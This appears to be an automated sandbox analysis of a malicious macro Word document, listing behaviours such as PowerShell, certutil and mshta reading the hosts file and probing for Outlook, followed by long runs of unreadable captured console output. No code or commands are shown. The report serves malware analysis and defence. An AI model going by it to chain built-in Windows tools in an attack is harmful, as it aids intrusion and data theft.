Source: Spiez CONVERGENCE.docOLE indicator, VBA macros: true
One or more processes crashShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exeFile read: C:\Windows\System32\drivers\etc\hosts
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@52/33@16/3
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$iez CONVERGENCE.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR975F.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: Spiez CONVERGENCE.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: Spiez CONVERGENCE.docOLE document summary: title field not present or empty
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2......3.ip.../........3.i........L|.i......-l$(.i..-l..I$L|.iH............7.i.......i....X?........2.....$(.i...i....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/.......\...A.Gu................a.Gu..0.............D......................./.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......;...X?......A.Gux...............a.Gu..0.............D.......................;.........2.\.....Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;.......\...A.Gu................a.Gu..0.............D...)...................;.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.0.............D...Q...................G.......X...".....Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G.......\...A.Gu................a.Gu..0.............D...l...................G.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......S...X?......A.Gux...............a.Gu..0.............D.......................S.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S.......\...A.Gu................a.Gu..0.............D.......................S.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x......._...X?......A.Gux...............a.Gu..0.............D......................._.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_.......\...A.Gu................a.Gu..0.............D......................._.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......k...X?......A.Gux...............a.Gu..0.............D.......................k.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k.......\...A.Gu................a.Gu..0.............D...5...................k.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......w...X?......A.Gux...............a.Gu..0.............D...]...................w.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w.......\...A.Gu................a.Gu..0.............D...x...................w.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...).............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...D.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...l.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...5.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...P.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...x.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...A.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...\.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...%.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......+...X?......A.Gux...............a.Gu..0.............D...M...................+.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................+.......\...A.Gu................a.Gu..0.............D...h...................+.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......7...X?......A.Gux...............a.Gu..0.............D.......................7.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................7.......\...A.Gu................a.Gu..0.............D.......................7.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......C...X?......A.Gux...............a.Gu..0.............D.......................C.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................C.......\...A.Gu................a.Gu..0.............D.......................C.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......O...X?......A.Gux...............a.Gu..0.............D.......................O.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................O.......\...A.Gu................a.Gu..0.............D...1...................O.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......[...X?......A.Gux...............a.Gu..0.............D...Y...................[.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................[.......\...A.Gu................a.Gu..0.............D...t...................[.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......g...X?......A.Gux...............a.Gu..0.............D.......................g.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................g.......\...A.Gu................a.Gu..0.............D.......................g.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......s...X?......A.Gux...............a.Gu..0.............D.......................s.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................s.......\...A.Gu................a.Gu..0.............D.......................s.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...".............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...=.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...e.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...I.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...q.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...:.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...U.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...}.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...F.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...a.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......'...X?......A.Gux...............a.Gu..0.............D.......................'.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................'.......\...A.Gu................a.Gu..0.............D.......................'.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......3...X?......A.Gux...............a.Gu..0.............D.......................3.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................3.......\...A.Gu................a.Gu..0.............D...-...................3.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......?...X?......A.Gux...............a.Gu..0.............D...U...................?.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................?.......\...A.Gu................a.Gu..0.............D...p...................?.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......K...X?......A.Gux...............a.Gu..0.............D.......................K.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................K.......\...A.Gu................a.Gu..0.............D.......................K.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......W...X?......A.Gux...............a.Gu..0.............D.......................W.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................W.......\...A.Gu................a.Gu..0.............D.......................W.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......c...X?......A.Gux...............a.Gu..0.............D.......................c.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................c.......\...A.Gu................a.Gu..0.............D...9...................c.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......o...X?......A.Gux...............a.Gu..0.............D...a...................o.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................o.......\...A.Gu................a.Gu..0.............D...|...................o.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......{...X?......A.Gux...............a.Gu..0.............D.......................{.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................{.......\...A.Gu................a.Gu..0.............D.......................{.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...*.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...E.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...m.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...6.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...Q.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...y.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...B.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...].....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...&.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......#...X?......A.Gux...............a.Gu..0.............D...N...................#.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#.......\...A.Gu................a.Gu..0.............D...i...................#.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x......./...X?......A.Gux...............a.Gu..0.............D......................./.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/.......\...A.Gu................a.Gu..0.............D......................./.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......;...X?......A.Gux...............a.Gu..0.............D.......................;.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;.......\...A.Gu................a.Gu..0.............D.......................;.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......G...X?......A.Gux...............a.Gu..0.............D.......................G.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G.......\...A.Gu................a.Gu..0.............D...2...................G.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......S...X?......A.Gux...............a.Gu..0.............D...Z...................S.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S.......\...A.Gu................a.Gu..0.............D...u...................S.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x......._...X?......A.Gux...............a.Gu..0.............D......................._.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_.......\...A.Gu................a.Gu..0.............D......................._.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......k...X?......A.Gux...............a.Gu..0.............D.......................k.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k.......\...A.Gu................a.Gu..0.............D.......................k.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x.......w...X?......A.Gux...............a.Gu..0.............D...#...................w.........2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w.......\...A.Gu................a.Gu..0.............D...>...................w.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...f.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...2.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...M.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...u.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...>.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...Y.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
